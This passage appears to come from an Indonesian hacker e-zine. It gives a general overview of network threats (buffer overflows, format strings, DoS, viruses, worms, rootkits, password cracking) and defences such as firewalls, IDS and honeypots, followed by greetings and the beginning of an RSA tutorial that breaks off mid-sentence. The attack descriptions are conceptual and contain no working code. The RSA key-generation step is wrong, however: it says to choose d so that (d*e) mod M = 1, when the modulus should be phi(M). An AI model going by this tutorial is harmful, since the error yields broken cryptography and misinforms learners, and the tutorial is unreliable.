dirubah setting-nya ke konfigurasi default oleh orang luar.

Pemilihan jenis metode transmisi juga mempunyai peranan penting didalam
masalah keamanan. Setiap informasi rahasia tidak boleh di transmisikan secara
wireless, setidaknya tidak tanpa menggunakan enkripsi yang bagus, sehingga
setiap orang dapat menyadap komunikasi "wireless" yang terkirim. Sangat
dianjurkan untuk menggunakan firewall untuk membatasi akses kedalam jaringan
komputer ke tingkat yang dibutuhkan. Firewall juga dapat menjadi titik
terlemah[9], yang mana dapat membuat perasaan aman [10]. Firewall harus
mengizinkan arus data kedalam sebuah jaringan komputer jika terdapat juga
arus data keluar dari jaringan komputer tersebut melalui firewall dan ini
dapat menjadi titik terlemah. Fakta penting lainnya bahwa tidak semua serangan
dilancarkan melalui firewall [10].


-- -- -( Mengamankan Jaringan Komputer )

Mengamankan jaringan komputer membutuhkan tiga tingkatan proses. Untuk
mengamankan jaringan komputer kita harus dapat melakukan pemetaan terhadap
ancaman yang mungkin terjadi.

+ Prevention (pencegahan).

Kebanyakan dari ancaman akan dapat ditepis dengan mudah, walaupun
keadaan yang benar-benar 100% aman belum tentu dapat dicapai. Akses yang
tidak diinginkan kedalam jaringan komputer dapat dicegah dengan memilih dan
melakukan konfigurasi layanan (services) yang berjalan dengan hati-hati.

+ Observation (observasi).

Ketika sebuah jaringan komputer sedang berjalan, dan sebuah akses
yang tidak diinginkan dicegah, maka proses perawatan dilakukan. Perawatan
jaringan komputer harus termasuk melihat isi log yang tidak normal yang dapat
merujuk ke masalah keamanan yang tidak terpantau. System IDS dapat digunakan
sebagai bagian dari proses observasi tetapi menggunakan IDS seharusnya tidak
merujuk kepada ketidak-pedulian pada informasi log yang disediakan.

+ Response (respon).

Bila sesuatu yang tidak diinginkan terjadi dan keamanan suatu system
telah berhasil disusupi, maka personil perawatan harus segera mengambil
tindakan. Tergantung pada proses produktifitas dan masalah yang menyangkut
dengan keamanan maka tindakan yang tepat harus segera dilaksanakan. Bila
sebuah proses sangat vital pengaruhnya kepada fungsi system dan apabila
di-shutdown akan menyebabkan lebih banyak kerugian daripada membiarkan
system yang telah berhasil disusupi tetap dibiarkan berjalan, maka harus
dipertimbangkan untuk direncakan perawatan pada saat yang tepat [1]. Ini
merupakan masalah yang sulit dikarenakan tidak seorangpun akan segera tahu
apa yang menjadi celah begitu system telah berhasil disusupi dari luar.

+ Victims/statistic (korban/statistik).

Keamanan jaringan komputer meliputi beberapa hal yang berbeda yang
mempengaruhi keamanan secara keseluruhan. Serangan keamanan jaringan komputer
dan penggunaan yang salah dan sebegai contoh adalah virus, serangan dari
dalam jaringan komputer itu sendiri, pencurian perangkat keras (hardware),
penetrasi kedalam system, serangan "Denial of Service" (DoS), sabotase,
serangan "wireless" terhadap jaringan komputer, penggantian halaman depan
situs (website defacement), dan penggunaan yang salah terhadap aplikasi web.
Statistik menunjukkan jumlah penyusupan didalam area ini sudah cukup banyak
berkurang dari tahun 2003 [24], tipe variasi dari serangan, bagaimanapun juga,
menyebabkan hampir setiap orang adalah sasaran yang menarik.


-- -- -( Masalah keamanan )

Jaringan komputer moderen adalah entitas dari banyak komponen kecil.
Disini akan dijelaskan beberapa titik lemah dari komponen yang berbeda.

+ Weak protocols (protokol yang lemah).

Komunikasi jaringan komputer menggunakan protokol antara client dan
server. Kebanyakan dari protokol yang digunakan saat ini merupakan protokol
yang telah digunakan beberapa dasawarsa belakangan. Protokol lama ini, seperti
File Transmission Protocol (FTP), TFTP ataupun telnet [11], tidak didesain
untuk menjadi benar-benar aman. Malahan faktanya kebanyakan dari protokol
ini sudah seharusnya digantikan dengan protokol yang jauh lebih aman,
dikarenakan banyak titik rawan yang dapat menyebabkan pengguna (user) yang
tidak bertanggung jawab dapat melakukan eksploitasi. Sebagai contoh, seseorang
dengan mudah dapat mengawasi "traffic" dari telnet dan dapat mencari tahu nama
user dan password.

+ Software issue (masalah perangkat lunak).

Menjadi sesuatu yang mudah untuk melakukan eksploitasi celah pada
perangkat lunak. Celah ini biasanya tidak secara sengaja dibuat tapi
kebanyakan semua orang mengalami kerugian dari kelemahan seperti ini. Celah
ini biasanya dibakukan bahwa apapun yang dijalankan oleh "root" pasti mempunyai
akses "root", yaitu kemampuan untuk melakukan segalanya didalam system tersebut.
Eksploitasi yang sebenarnya mengambil keuntungan dari lemahnya penanganan data
yang tidak diduga oleh pengguna, sebagai contoh, buffer overflow dari celah
keamanan "format string" merupakan hal yang biasa saat ini.

Eksploitasi terhadap celah tersebut akan menuju kepada situasi dimana
hak akses pengguna akan dapat dinaikkan ke tingkat akses yang lebih tinggi.
Ini disebut juga dengan "rooting" sebuah "host" dikarenakan penyerang biasanya
membidik untuk mendapatkan hak akses "root" [2].

+ Buffer overflow.

"Buffer overflow" mempunyai arti sama dengan istilahnya. Programmer
telah mengalokasikan sekian besar memory untuk beberapa variabel spesifik.
Bagaimanapun juga, dengan celah keamanan ini, maka variabel ini dapat dipaksa
menuliskan kedalam "stack" tanpa harus melakukan pengecekan kembali bila
panjang variabel tersebut diizinkan. Jika data yang berada didalam buffer
ternyata lebih panjang daripada yang diharapkan, maka kemungkinan akan
melakukan penulisan kembali stack frame dari "return address" sehingga alamat
dari proses eksekusi program dapat dirubah.

Penulis "malicious code" biasanya akan akan melakukan eksploitasi
terhadap penulisan kembali "return address" dengan merubah "return address"
kepada "shellcode" pilihan mereka sendiri untuk melakukan pembatalan akses
"shell" dengan menggunakan hak akses dari "user-id" dari program yang
tereksploitasi tersebut [12]. "Shellcode" ini tidak harus disertakan dalam
program yang tereksploitasi, tetapi biasanya dituliskan ke dalam bagian celah
dari "buffer". Ini merupakan trik yang biasa digunakan pada variabel
"environment" seperti ini.

"Buffer overflow" adalah masalah fundamental berdasarkan dari
arsitektur komputasi modern. Ruang untuk variabel dan kode itu sendiri tidak
dapat dipisahkan kedalam blok yang berbeda didalam "memory". Sebuah perubahan
didalam arsitektur dapat dengan mudah menyelesaikan masalah ini, tapi perubahan
bukan sesuatu yang mudah untuk dilakukan dikarenakan arsitektur yang digunakan
saat ini sudah sangat banyak digunakan.

+ Format string.

Metode penyerangan "format string" merupakan sebuah metode penyerangan
baru, ini diumumkan kepada publik diakhir tahun 2000. Metode ini ditemukan
oleh hacker 6 bulan sebelum diumumkan kepada masyarakat luas. Secara fundamental
celah ini mengingatkan kita akan miripnya dengan celah "buffer overflow" [13].

Kecuali celah tersebut tercipta dikarenakan kemalasan (laziness),
ketidakpedulian (ignorance), atau programmer yang mempunyai skill pas-pasan.
Celah "format string" biasanya disebabkan oleh kurangnya "format string"
seperti "%s" di beberapa bagian dari program yang menciptakan output, sebagai
contoh fungsi printf() di C/C++. Bila input diberikan dengan melewatkan
"format string" seperti "%d" dan "%s"kepada program maka dengan mudah
melihat "stack dump" atau penggunaan teknik seperti pada "buffer overflow".

Celah ini berdasarkan pada "truncated format string" dari "input".
Ini merujuk kepada situasi dimana secara external, data yang disuplai yang
diinterpretasikan sebagai bagian dari "format string argument" [13]. Dengan
secara spesial membuat suatu input dapat menyebabkan program yang bermasalah
menunjukkan isi memory dan juga kontrol kepada eksekusi program dengan
menuliskan apa saja kepada lokasi pilihan sama seperti pada eksploitasi
"overflow".

+ Hardware issue (masalah perangkat keras).

Biasanya perangkat keras tidak mempunyai masalah pada penyerangan
yang terjadi. Perangkat lunak yang dijalankan oleh perangkat keras dan
kemungkinan kurangnya dokumentasi spesifikasi teknis merupakan suatu titik
lemah. Berikut ini merupakan contoh bagaimana perangkat keras mempunyai
masalah dengan keamanan.

contoh 1: Cisco

Sudah lazim router cisco dianggap mempunyai masalah sistematis didalam
perangkat lunak IOS (Interwork operating system) yang digunakan oleh mereka
sebagai sistem operasi pada tahun 2003. Celah dalam perangkat lunak dapat
menuju kepada "denial of service" (Dos) dari semua perangkat router. Masalah
keamanan ini terdapat dalam cara IOS menangani protokol 53(SWIPE), 55(IP
Mobility) dan 77(Sun ND) dengan nilai TTL (Time to live) 0 atau 1 [23].

Biasanya, Protocol Independent Multicast (PIM) dengan semua nilai
untuk hidup, dapat menyebabkan router menandai input permintaan yang penuh
terhadap "interface" yang dikirimkan. Sebagai permintaan bila penuh, maka
router tidak akan melakukan proses "traffic" apapun terhadap "interface"
yang dipertanyakan [3]. Cisco juga mempunyai beberapa celah keamanan yang
terdokumentasi dan "patch" yang diperlukan telah tersedia untuk waktu yang
cukup lama.

contoh 2: Linksys

Perangkat linksys mempunyai harga yang cukup murah sehingga banyak
digunakan oleh orang. Beberapa perangkat linksys mempunyai masalah dengan
celah keamanan yang dapat menuju kepada serangan "denial of service" (DoS).
Celah keamanan yang memprihatinkan terdapat pada penanganan parameter "URL
Embedded" yang dikirimkan kepada perangkat.

+ Misconfiguration (konfigurasi yang salah).

Kesalahan konfigurasi pada server dan perangkat keras (hardware)
sangat sering membuat para penyusup dapat masuk kedalam suatu system dengan
mudah. Sebagai contoh, penggantian halaman depan suatu situs dikarenakan
kesalahan konfigurasi pada perangkat lunak "www-server" atapun modulnya.
Konfigurasi yang tidak hati-hati dapat menyebabkan usaha penyusupan menjadi
jauh lebih mudah terlebih jika ada pilihan lain yang dapat diambil oleh para
penyusup.

Sebagai contoh, sebuah server yang menjalankan beberapa layanan SSH
dapat dengan mudah disusupi apabila mengijinkan penggunaan protokol versi 1
atau "remote root login" (RLOGIN) diizinkan. Kesalahan konfigurasi yang jelas
ini menyebabkan terbukanya celah keamanan dengan penggunaan protokol versi 1,
seperti "buffer overflow" yang dapat menyebabkan penyusup dapat mengambil
hak akses "root" ataupun juga dengan menggunakan metode "brute-force password"
untuk dapat menebak password "root".

+ DoS, DDoS.

Serangan Denial of Service adalah serangan yang mengakibatkan setiap
korbannya akan berhenti merespon [5] atau "bertingkah" tidak lazim. Contoh
serangan klasik "DoS" adalah "Ping of Death" dan "Syn Flood" yang untungnya
sudah hampir tidak dapat dijumpai pada saat sekarang. Biasanya serangan DoS
menyerang celah yang terdapat pada layanan system atau pada protokol jaringan
kerja untuk menyebabkan layanan tidak dapat digunakan. Tehnik yang lainnya
adalah menyebabkan system korban "tersedak" dikarenakan banyaknya paket yang
diterima yang harus diproses melebihi kemampuan dari system itu sendiri atau
menyebabkan terjadinya "bottleneck" pada bandwidth yang dipakai oleh system.

Serangan "Distributed Denial of Service" (DDoS) merupakan tipe serangan
yang lebih terorganisasi. Jenis serangan ini biasanya membutuhkan persiapan dan
juga taktik untuk dapat menjatuhkan korbannya dengan cepat dan sebelumnya
biasanya para penyerang akan mencari system kecil yang dapat dikuasai dan
setelah mendapat banyak system kecil maka penyerang akan menyerang system yang
besar dengan menjalankan ribuan bahkan puluhan ribu system kecil secara
bersamaan untuk menjatuhkan sebuah system yang besar [5].

Worm "MyDoom" yang terkenal itu dibuat untuk melancarkan serangan
besar-besaran dari puluhan ribu system yang terinfeksi untuk menyerang situs
www.sco.com. Serangan itu sukses besar yang menyebabkan www.sco.com harus
dipindahkan dari DNS untuk dapat menjalankan kembali layanan [20].

+ Viruses (virus).

Salah satu definisi dari program virus adalah menyisipkan dirinya
kepada objek lain seperti file executable dan beberapa jenis dokumen yang
banyak dipakai orang. Selain kemampuan untuk mereplikasi dirinya sendiri, virus
dapat menyimpan dan menjalankan sebuah tugas spesifik. Tugas tersebut bisa
bersifat menghancurkan atau sekedar menampilkan sesuatu ke layar monitor
korban dan bisa saja bertugas untuk mencari suatu jenis file untuk dikirimkan
secara acak ke internet bahkan dapat melakukan format pada hard disk korban [18].

Virus yang tersebar di internet yang belum dikenali tidak akan dapat
ditangkap oleh program antivirus ataupun semacamnya yang meskipun korban telah
terjangkiti tetapi tidak mengetahuinya. Perangkat lunak antivirus biasanya
mengenali virus atau calon virus melalui tanda yang spesifik yang terdapat
pada bagian inti virus itu sendiri. Beberapa virus menggunakan tehnik polymorphic
agar luput terdeteksi oleh antivirus.

Kebiasaan virus polymorphic adalah merubah dirinya pada setiap infeksi
yang terjadi yang menyebabkan pendeteksian menjadi jauh lebih sulit [18].
Praktisnya setiap platform komputer mempunyai virus masing-masing dan ada
beberapa virus yang mempunyai kemampuan menjangkiti beberapa platform yang
berbeda (multi-platform). Virus multi-platform biasanya menyerang executable
ataupun dokumen pada Windows dikarenakan kepopuleran oleh system operasi
Microsoft Windows dan Microsoft Office sehingga banyak ditemukan virus
yang bertujuan untuk menghancurkan "kerajaan" Microsoft Corp [4].

+ Worms.

Sebuah "worm" komputer merupakan program yang menyebar sendiri dengan
cara mengirimkan dirinya sendiri ke system yang lainnya. Worm tidak akan
menyisipkan dirinya kepada objek lain [18]. Pada saat sekarang banyak terjadi
penyebaran worm dikarenakan para pengguna komputer tidak melakukan update pada
perangkat lunak yang mereka gunakan, yang dimana ini berarti, sebagai contoh,
Outlook Express mempunyai fungsi yang dapat mengizinkan eksekusi pada file
sisipan (attachment) e-mail tanpa campur tangan dari pengguna komputer itu sendiri.

+ Trojan horse.

Trojan horse adalah program yang berpura-pura tidak berbahaya tetapi
sebenarnya mereka sesuatu yang lain [18]. Salah fungsi yang biasa terdapat
pada "trojan horse" adalah melakukan instalasi "backdoor" sehingga si pembuat
program dapat menyusup kedalam komputer atau system korban.

+ junk mail (surat sampah).

"junk mail" sesungguhnya bukan suatu ancaman keamanan yang serius,
tetapi dengan penyebaran virus dan worm melalui e-mail, maka jumlah junk mail
juga ikut bertambah. Ancaman keamanan sesungguhnya bukan dari e-mail sampah
itu sendiri melainkan file sisipannya (attachment) yang patut diwaspadai
dikarenakan penyebaran virus dan worm menggunakan metode ini.

+ Time bomb (bom waktu).

"Time bomb" adalah program yang mempunyai tugas tetapi dengan waktu
tertentu baru akan menjalankan tugasnya. Beberapa jenis virus dan worm juga
mempunyai kesamaan fungsi dengan aplikasi ini. Time bomb berbeda dengan
virus ataupun worm dikarenakan dia tidak melakukan replikasi terhadap
dirinya tetapi melakukan instalasi sendiri kedalam system.


-- -- -( Hacking: Hackers and Victims (hacking: pelaku dan korban) )

Hacker dikategorikan kedalam beberapa kategori yang berbeda tergantung
pada jenis kegiatan mereka. Kebanyakan hacker adalah para "script-kiddies"
yang biasa menggunakan exploit atau program yang tersedia di internet untuk
melancarkan aksi mereka [19]. Jika tujuan mereka adalah untuk kepentingan
komersial atau kepentingan militer maka taruhannya menjadi lebih tinggi
dan biasanya mereka akan memilih korban mereka dengan hati-hati.

Alasan dibalik hacking sendiri bermacam-macam. Script kiddies biasanya
akan melakukan "scanning" beberapa blok IP untuk mencari kemungkinan host yang
"vulnerable" (bisa diserang) dan mencoba melakukan eksploitasi kepada beberapa
daemon yang ditemukan. Satu grup hacker biasanya mencoba program atau script
yang mereka kembangkan untuk melihat apakah hasil kerja mereka sukses. Tapi
bagaimanapun juga, seseorang dapat menjadi "black-hat" atapun "white-hat"
tergantung pada filosofi, nilai etis dan motivasi mereka sendiri.

"White-hat" berarti jika seorang "hacker" berhasil dalam usahanya
dan sebagai contoh berhasil masuk kedalam sebuah system yang bukan tanggung
jawab dia, maka dia akan memberitahukan kepada system administrator mengenai
celah keamanan yang terdapat di dalam system tersebut dan bagaimana cara
menutup celah keamanan itu serta cara memperkuat host tersebut (host hardening).
Tujuan dasarnya adalah untuk penelitian. "White-hat" biasanya adalah para
"security professional" dan disewa untuk melakukan "system penetration" atau
memberikan konsultasi keamanan jaringan.

"Black-hat" adalah orang yang dipanggil "white-hat" sebagai "cracker"
(pembongkar). Tujuan para "cracker" tidak selalu baik, mereka biasanya masuk
kedalam suatu system untuk mencuri informasi atau mempersiapkan system itu
untuk melakukan serangan terhadap system yang lain, "DDoS" sebagai contoh.
"Black-hat" biasanya meninggalkan backdoor di system yang berhasil disusupi.

Terdapat juga jenis "grey-hat" atau orang yang tidak merusak tapi
sering menyusup kedalam system lain tanpa memberitahu kepada System
administrator system tersebut apabila terdapat celah keamanan, mereka tidak
terlalu merusak tapi juga tipe yang tidak terlalu diinginkan.


-- -- -( Different Types of Attacking (jenis-jenis serangan) )

+ Scanning.

"Scanning" adalah metode bagaimana caranya mendapatkan informasi
sebanyak-banyaknya dari IP/Network korban. Biasanya "scanning" dijalankan
secara otomatis mengingat "scanning" pada "multiple-host" sangat menyita
waktu. "Hackers" biasanya mengumpulkan informasi dari hasil "scanning" ini.
Dengan mengumpulkan informasi yang dibutuhkan maka "hackers" dapat menyiapkan
serangan yang akan dilancarkannya.

Nmap merupakan sebuah network scanner yang banyak digunakan oleh para
professional di bidang network security, walaupun ada tool yang khusus dibuat
untuk tujuan hacking, tapi belum dapat mengalahkan kepopuleran nmap.

Nessus juga merupakan network scanner tapi juga akan melaporkan apabila
terdapat celah keamanan pada target yang diperiksanya. Hacker biasanya menggunakan
Nessus untuk pengumpulan informasi sebelum benar-benar meluncurkan serangan.

Untungnya beberapa scanner meninggalkan "jejak" yang unik yang
memungkinkan para System administrator untuk mengetahui bahwa system mereka
telah di-scanning sehingga mereka bisa segera membaca artikel terbaru yang
berhubungan dengan informasi log.

+ Password cracking.

"Brute-force" adalah sebuah tehnik dimana akan dicobakan semua kemungkinan
kata kunci (password) untuk bisa ditebak untuk bisa mengakses kedalam sebuah
system. Membongkar kata kunci dengan tehnik ini sangat lambat tapi efisien,
semua kata kunci dapat ditebak asalkan waktu tersedia.

Untuk membalikkan "hash" pada kata kunci merupakan suatu yang hal
yang mustahil, tapi ada beberapa cara untuk membongkar kata kunci tersebut
walaupun tingkat keberhasilannya tergantung dari kuat lemahnya pemilihan
kata kunci oleh pengguna. Bila seseorang dapat mengambil data "hash" yang
menyimpan kata kunci maka cara yang lumayan efisien untuk dipakai adalah
dengan menggunakan metode "dictionary attack" yang dapat dilakukan oleh
utility John The Ripper [27].

Masih terdapat beberapa cara lainnya seperti "hash look-up table"
tapi sangat menyita "resources" dan waktu.

+ Rootkit.

"Rootkit" adalah alat untuk menghilangkan jejak apabila telah dilakukan
penyusupan. Rootkit biasanya mengikutkan beberapa tool yang dipakai oleh system
dengan sudah dimodifikasi sehingga dapat menutupi jejak. Sebagai contoh,
memodifikasi "PS" di linux atau unix sehingga tidak dapat melihat background
process yang berjalan.


-- -- -( Defending (bertahan) )

+ Firewall.

Komputer dan jaringan kerja yang terhubung dengan internet perlu untuk
dilindungi dari serangan. Firewall adalah cara yang lumayan efeltif untuk
melakukannya. Secara umum firewall akan memisahkan public network dan private
network.

Tipe firewall dapat dibagi menjadi beberapa kategori, contohnya: Packet
Filtering Firewall, "Proxy Firewall".

+ Logs.

Seorang system administrator wajib untuk melihat log dari system dari
waktu ke waktu. Dengan melihat log maka system administrator dapat melihat
aktifitas yang terjadi dan kemungkinan besar dapat melakukan antisipasi
apabila terlihat beberapa aktifitas yang mencurigakan terjadi.

+ IDS. (Intrusion Detection System)

Satu cara umum melakukan otomatisasi pada pengawasan penyusupan adalah
dengan menggunakan IDS. IDS akan mendeteksi jenis serangan dari "signature"
atau "pattern" pada aktifitas jaringan. Bahkan dapat melakukan blokade terhadap
traffic yang mencurigakan.

+ Honeypot.

"HoneyPot" adalah server "umpan" yang merupakan pengalih perhatian.
Tujuan dari honeypot adalah mereka tidak menjalankan layanan sebagaimana
umumnya server tetapi berpura-pura menjalankannya sehingga membiarkan
para penyusup untuk berpikir bahwa mereka benar-benar adalah "server" yang
sesungguhnya. Honeypot juga bermanfaat untuk melihat tehnik yang digunakan
oleh para penyusup untuk dapat masuk kedalam system juga sebagai alat untuk
mengumpulkan bukti sehingga para penyusup dapat diproses secara hukum.

+ Configuration.

Seperti yang telah dibahas sebelumnya, konfigurasi yang hati-hati
akan membantu anda untuk bertahan terhadap kemungkinan serangan yang terjadi.
Kebanyakan dari kasus penggantian halaman muka situs (web defacement) terjadi
dikarenakan kesalahan konfigurasi sehingga menyebabkan pihak ketiga dapat
mengambil keuntungan dari kesalahan ini.


-- -- -( Conclusion )-


Knowing the Laws of Security (Russel, Ryan):
[+] Client-Side Security doesn't work.
[+] You cannot securely exchange encryption keys without a shared piece of
information.
[+] Malicious code cannot be 100 percent protected against.
[+] Any malicious code can be completely morphed to bypass signature detection.
[+] Firewalls cannot protect you 100 percent from attack.
[+] Any intrusion detection system (IDS) can be evaded.
[+] Secret cryptographic algorithm are not secure.
[+] If a key isn't required, you do not have encryption - you have encoding.
[+] Password cannot be securely stored on the client unless there is another
password to protect them.
[+] In order for a system to begin to be considered secure, it must undergo
an independent security audit.
[+] Security through obscurity does not work.


The Ten Immutable Laws of Security (www.microsoft.com/technet/columns/security/
10imlaws.asp):
[+] if a bad guy can persuade you to run his program on your computer, it's
not your computer anymore.
[+] if a bad guy can alter the operating system on your computer, it's not
your computer anymore.
[+] if a bad guy has unrestricted physical access to your computer, it's not
your computer anymore.
[+] if you allow a bad guy to upload program to your website, it's not your
website anymore.
[+] weak password trump strong security.
[+] a machine is only as secure as the administrator is trust-worthy.
[+] encrypted data is only as secure as the decryption key.
[+] an out-dated virus scanner is only marginally better than no virus scanner
at all.
[+] absolute anonymity isn't practical, in real life or on the web.
[+] technology is not a panacea.


-- -- -( Reference )-


[1] Bosworth Seymor, Kebay M. E: Computer Security Handbook 4ed,
John Wiley & Sons 2002
[2] Check Point Software Technologies: Principles of Network Security,
Check Point Software Technologies 2003
[3] Kaye Doug, Loosely Coupled: Missing Pieces of Web Services,
RDS Press 2003
[4] Skillsoft Press: Cryptography Protocols and Algorithms,
Skillsoft press 2003
[5] Menga Justin, Timm Carl: CCSP: Secure Intrusion Detection and
SAFE Implementation Study Guide,
Sybex 2004
[6] Howard Michael: Designing Secure Web-Bases Applications for
Microsoft Windows 2000,
Microsoft Press 2000
[7] ITU-T: Compendium of Approved ITU-T Security Definitions,
edition 2003 February, ITU 2003
[8] Peuhkuri Markus: Lecture Material: Securing the Network
and Information, 2004
[9] Nguyen Hung Q., Johnson Bob, Hackett Michael: Testing Applications
on the Web: Test Planning for Mobile and Internet-Based System
2nd Edition,
John Wiley & Sons 2003
[10] Russell Ryan et al., Stealing the Network: How to Own the Box,
Syngress Publishing 2003
[11] Koconis David, Murray Jim, Purvis Jos, Wassom Darrin: Securing Linux:
A Survival Guide for Linux Security,
SANS Institute 2003
[12] Erickson Jon: Hacking: The Art of Exploitation,
No Starch Press 2003
[13] Mirza Ahmad David R. Et al.: Hack Proofing Your Network,
2nd Edition,
Syngress Publishing 2002
[14] Wang Wallace: Steal This Computer Book 3: What They Won't Tell
You About the Internet,
No Starch Press 2003
[15] Preethan V. V.:Internet Security and Firewalls,
Premier Press 2002
[16] Brenton Chris, Hunt Cameron: Mastering Network Security,
2nd Edition,
Sybex 2003
[17] Litlejohn Shinder, Debra : Scene of The Cybercrime -
Computer Forensic handbook,
Syngress Publishing 2003
[18] Crayton Christopher A.: The Security+ Exam Guide:
TestTakers Guide Series.
Charles River Media 2003
[19] Schmied Will et al.:MCSE/MCSA Implementing & Administering Security
in a Windows 2000 Network Study Guide,
Syngress Publising 2003
[20] Netcraft: Site Outages for The SCO Group,
http://news.netcraft.com/archives/20...sco_group.html
[21] Kevin Mitnick: The Art of Deception,
John Wiley & Sons 2003
[22] Shimonski Robert J. Et al.: The Best Damn Firewall Book Period,
Syngress Publishing 2003
[23] Andres Steven, Kenyon Brian: Security Sage�s Guide to Hardening
the Network Infrastructure,
Syngress Publishing 2004
[24] CSI/FBI: Computer Crime and Security Survey 2004
[25] Andress Mandy, Cox Phil, Tittel Ed (ed): CIW Security Professional
Certification Bible,
John Wiley & Sons 2001


-- -- -( Praise )-

Dear Father in Heaven.
ECHO Staff, Aikmel Crew, ISIC Staff & all people on 1stlink.
SSL Staff (especially for Ech0, thx for the apps you've build for me).
and for those whom i cannot put their names because the limit of space
for putting all of your guys names.
the last but not least, to my angel: Egla (thx for your patience honey,
i really need it).

EiC: 1 kn0w wh0 U 4r3. ;)


---------------
"installation' maximum neither on team appears hollowed 4 x-ray. 0n run,
immune' major jet undenied still thin after needed obligation running deeply
internals narrow abuse reign yet making a network while impact time hazardous
enormous xxx totally rules ashamed on regularly dinner insist night about
running yield commonly unbelieve research in open source insight tagged youth
and begging obsecure untold tales night ended trouble withstand on rude killing
commandement of majority put us tied in nameless god." - an0maly

Mengenal Algoritma Enkripsi RSA



RSA adalah sebuah algoritma berdasarkan skema public-key cryptography.
Diberi nama RSA sebagai inisial para penemunya: Ron Rivest, Adi Shamir, dan
Leonard Adleman. RSA dibuat di MIT pada tahun 1977 dan dipatenkan oleh MIT
pada tahun 1983. Setelah bulan September tahun 2000, paten tersebut
berakhir, sehingga saat ini semua orang dapat menggunakannya dengan bebas.

Lebih jauh, RSA adalah algoritma yang mudah untuk diimplementasikan dan
dimengerti. Algoritma RSA adalah sebuah aplikasi dari sekian banyak teori
seperti extended euclid algorithm, euler's function sampai fermat theorem.

Artikel ini menjelaskan algoritma RSA dari dasar. Saya akan menggunakan
nilai-nilai yang kecil untuk menjelaskan bagaimana cara kerja algoritma RSA.


----| Public-Key Cryptography

Konsep fundamental dari Public-Key Cryptography ditemukan oleh Whitfield
Diffie dan Martin Hellman, dan secara terpisah oleh Ralph Merkle.

Sedangkan konsep dasar Public-Key Cryptography terletak pada pemahaman
bahwa keys selalu berpasangan: encryption key dan decryption key. Juga perlu
diingat bahwa sebuah key tidak dapat digenerate dari key lainnya. Pemahaman
encryption dan decryption key sering disebut sebagai public dan private key.
Seseorang harus memberikan public key-nya agar pihak lain dapat meng-encrypt
sebuah pesan. Decryption hanya terjadi jika seseorang mempunyai private key.


----| Scenario

Bagian ini menjelaskan skenario bagaimana public-key cryptosystem bekerja.
Saya akan menggunakan partisipan klasik Alice dan Bob sebagai orang-orang
yang melakukan pertukaran informasi.

1. Alice dan Bob setuju untuk menggunakan public-key cryptosystem.

2. Bob mengirimkan public key-nya kepada Alice.

3. Alice meng-encrypt pesan yang dibuatkan dengan menggunakan public
key milik Bob dan mengirimkan pesan yang sudah di-encrypt kepada
Bob.

4. Bob men-decrypt pesan dari Alice menggunakan private key
miliknya.


------| Mathematical Notation

Untuk memahami algoritma RSA, seseorang harus memahami beberapa notasi
matematika dasar, teori dan formula. Hal tersebut dibutuhkan untuk mendukung
semua kalkulasi yang dilakukan dalam algoritma RSA.

1. Modulo (didenotasikan dengan 'x mod m' atau 'x % m' dalam beberapa
bahasa komputer)

- x % m = x mod m = pembagian x dengan m dan mengambil sisanya.

- Contoh: 25 mod 5 = 0 karena 5 habis membagi 25
25 mod 4 = 1 karena 25 / ( 4 * 6 ) menyisakan 1
x mod m = x jika dan hanya jika x < m

2. Z/mZ

- Z/7Z : { 0,1,2,3,4,5,6 } dimana [7]=[0], [8]=[1], [9]=[2] dan
seterusnya.

- Operasi yang didukung dalam Z/mZ aalah penjumlahan, pengurangan,
pembagian dan perkalian.

- Inverse: Sebuah elemen dalam Z/mZ seperti A, memiliki sebuah inverse B
jika dan hanya jika [A]x[B] = [1]

- Units: Setiap elemen dalam Z/mZ yang memiliki inverse adalah sebuah
unit.

- Contoh: Z/7Z

Penjumlahan: [2]+[3] = [5] ; [5]+[5] = [10] ... [10-7] = [3]
Pengurangan: [2]-[3] = [-1] = [6] ; [6]-[4] = [2]
Pembagian : [6]/[2] = [3] ; [6]/[4] = [5] ([4]x[5] = [20] = [6])
Perkalian : [2]x[6] = [12] = [5] ;

Soal: [6]/[4]

a. Tempatkan dalam formula [6] = [X][4]
b. Cari inverse dari [4], yaitu [2] ... [4]x[2] = [8] = [1]
c. Kali inverse dengan [6] ... [2]x[6] = [12] = [5]
d. Sehingga [4]x[5] = [20] = [13] = [6]


3. GCD(A,B)

GCD = greatest common divisor.

GCD(A,B) = D
GCD(78,32) = 2, karena tidak ada bilangan yang lebih besar dari dua yang
membagi 78 dan 32.

GCD(A,B) dapat ditemukan dengan menggunakan algoritma extended euclid.

Jika GCD(A,B) = 1 maka A and B dalah coprime satu sama lainnya (dengan
kata lain, A dan B adalah relatively prime).

4. Memecahkan 8x mod 13 = 1, dimana x adalah bilangan yang belum diketahui.

- Cari gcd(8,13) yang berarti 1 ... yang berarti persamaan dapat
diselesaikan.

- Membuat sebuah matriks dan menggunakan operasi gaussian dalam matriks.

8 | 1 0 r2=r2-r1 8 | 1 0 r1=r1-r2
13 | 0 1 ---------> 5 | -1 1 --------->


3 | 2 -1 r2=r2-r1 3 | 2 -1
5 | -1 1 ---------> 2 |-3 2


lakukan sampai kita mendapatkan format : 1 | s t
0 | s' t'

s, t, s', t' dapat berupa bilangan apa saja.

Jika hasil akhir yang di dapat sbb: 0 | s' t' , kita harus
1 | s t

rotasi atas-bawah hasil nya menjadi format: 1 | s t
0 | s' t'

sehingga sekarang kita mendapatkan d = 1, s = 5, t = -3, sehingga
x = s = 5.

5. Euler's phi function (jangan sampai keliru dengan phi = 3.14)

- Euler's phi function adalah sebuah total bilangan unit dalam Z/mZ

- Theorem

a. Jika p adalah sebuah bilangan prima, maka phi(p) = p - 1
p dan phi(p) adalah (contoh: gcd(p,phi(p)) = 1)

ii): phi(m*n) = phi(m) * phi (n)
phi(p^a) = (p^a) - p^(a-1)

b. Contoh:

-- phi(7) = 6
-- phi(840) = phi(8) * phi(105) = phi(2^3) * phi(3*5*7)
= [(2^3) - (2^2)] * phi(3) * phi(5) * phi(7)

6. Pangkat. pow(a,b)
Saya akan menggunakan notasi '^' seperti pada a^b


----| Key Generation

Misalkan Alice ingin Bob mengirimnya sebuah pesan melalui jalur yang aman.
Alice akan memberikan public keynya kepada Bob dan menyimpan private key
untuk dirinya.

a. Pilih 2 bilangan prima besar seperti p,q dimana p tidak sama
dengan q.

b. Hitung M = p x q

c. Hitung phi(M) = phi(p) * phi(q)

d. Pilih sebuah integer 'e' dimana 1 < e < phi(M) dan 'e' serta
phi(M) adalah coprime.

e. Hitung 'd' integer sehingga (d * e) mod M = 1

f. (M,e) adalah public key dimana M adalah modulo dan e adalah
eksponen encryption.

g. (M,d) adalah private key dimana M adalah modulo dan d adalah
